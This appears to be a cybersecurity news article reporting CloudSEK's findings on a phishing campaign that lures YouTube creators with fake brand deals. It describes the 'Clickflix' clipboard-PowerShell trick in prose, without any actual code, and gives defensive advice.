YouTube Creators Targeted by Weaponized Brand Deals Using ‘Clickflix’ Attack Tactic

A new wave of cyberattacks is targeting YouTube creators, leveraging fake brand collaboration offers to distribute malware.

Cybersecurity firm CloudSEK has uncovered a sophisticated phishing campaign that employs the “Clickflix” technique to deceive content creators and compromise their systems.

The attack vector begins with threat actors scraping email addresses from YouTube channels using specialized parser tools.

They then utilize browser automation to send bulk phishing emails that impersonate legitimate brand collaboration proposals.

These emails contain enticing compensation structures based on subscriber count, designed to lure creators into engaging with malicious attachments.

Clickflix Technique: A New Level of Deception

The Clickflix technique represents an advanced method of malware delivery.

When victims click on a link purporting to be a payment form or wire transfer document, they are directed to a fake Microsoft Word Online page.

This page displays an error message claiming that an extension is not installed, offering “How to fix” and “Auto-fix” options.

Clicking the “How to fix” button surreptitiously copies a base64-encoded PowerShell command to the user’s clipboard.

The page then instructs the target to open a PowerShell terminal and right-click, which pastes and executes the malicious code.

This social engineering tactic tricks users into unknowingly initiating the malware infection process.

Once activated, the malware can steal browser data, including login credentials, cookies, and wallet information.

In some cases, it may grant remote access to the attackers, potentially leading to account takeovers and data theft.

Wide-Reaching Campaign with Global Impact

According to the Report, The scope of this campaign is significant, with over 200,000 YouTube creators targeted globally.

Attackers are sending between 500 to 1,000 phishing emails from a single account, utilizing more than 340 SMTP servers to distribute their malicious messages.

The campaign primarily focuses on individuals in marketing, sales, and executive positions, as they are more likely to engage with brand collaborations and promotional offers.

This targeting strategy increases the effectiveness of the phishing attempts.

As the threat landscape evolves, content creators must remain vigilant.

Experts recommend exercising caution with unsolicited collaboration offers, especially those containing password-protected attachments.

Creators should independently verify the legitimacy of brand deals and avoid downloading attachments from unknown senders, even if they appear to be password-protected.

The Clickflix attack serves as a stark reminder of the increasingly sophisticated tactics employed by cybercriminals.

As YouTube creators continue to be lucrative targets, the importance of robust cybersecurity practices and awareness cannot be overstated.

Are you from SOC/DFIR Teams? – Analyse Malware, Phishing Incidents & get live Access with ANY.RUN -> Start Now for Free.